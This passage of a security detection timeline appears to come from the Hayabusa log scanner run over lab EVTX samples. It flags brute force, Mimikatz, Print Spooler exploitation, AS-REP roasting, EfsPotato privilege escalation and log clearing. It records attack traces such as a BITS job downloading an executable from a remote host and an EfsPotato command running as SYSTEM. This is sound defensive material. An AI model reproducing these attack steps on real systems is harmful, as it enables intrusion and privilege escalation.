User: sshd_4332 : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_4332 : Workstation: - : IP Address: - : Port: - : LogonID: 0x47a203c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:18.227 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: admmig : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:22.562 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:22.562 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,- +2021-05-22 05:43:49.345 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: 
Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:50.131 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:50.607 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:50.866 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-23 06:56:57.685 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47156 : LogonID: 0x312517c1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47160 : LogonID: 0x31251a6a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC 
Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.373 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65333 : LogonID: 0x31251ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.375 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65335 : LogonID: 0x31251d11,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65336 : LogonID: 0x31251d23,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.380 
+09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65337 : LogonID: 0x31251d36,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx +2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,informational,Kerberos TGT was requested,User: admin-test : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0 : PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx +2021-06-01 23:06:34.542 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: WADGUtilityAccount : SID:S-1-5-21-1081258321-37805170-3511562335-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" +2021-06-01 23:08:21.225 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: elie : SID:S-1-5-21-1081258321-37805170-3511562335-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" +2021-06-03 21:17:56.988 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx +2021-06-03 21:18:12.941 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx +2021-06-03 21:18:12.942 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 56061 : LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx +2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,high,Windows Firewall Profile Disabled,,rules/sigma/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-04 04:17:44.873 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-04 04:39:52.893 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-04 04:39:52.895 
+09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-04 04:39:53.056 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-04 17:41:47.982 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx +2021-06-04 17:41:48.041 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx +2021-06-11 06:21:20.636 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 51503 : LogonID: 0x5a4175e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 56594 : LogonID: 0x5a41984,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec 
remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx +2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File 
Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-13 15:17:18.087 +09:00,sv-dc.hinokabegakure-no-sato.local,59,informational,Bits Job Creation,Job Title: test : URL: http://192.168.10.254:80/calc.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS Jobs/Windows-BitsClient.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx 
+2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: c:\temp\EfsPotato.exe whoami : Path: C:\temp\EfsPotato.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\temp\EfsPotato.exe whoami,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,low,Local Accounts 
Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.250 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe"" -Embedding : Path: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-10-19 23:33:13.262 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx +2021-10-19 23:40:28.001 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx +2021-10-19 23:42:41.218 +09:00,FS03.offsec.lan,4728,medium,User added to global security group,Member added: - : SID: S-1-5-21-3410678313-1251427014-1131291384-1004 : Group: None : Subject user: admmig : Subject domain: 
OFFSEC,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx +2021-10-19 23:42:41.234 +09:00,FS03.offsec.lan,4720,medium,Local user account created,User: toto3 : SID:S-1-5-21-3410678313-1251427014-1131291384-1004,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx +2021-10-19 23:44:30.780 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx +2021-10-19 23:45:16.394 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx +2021-10-20 22:39:12.731 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: 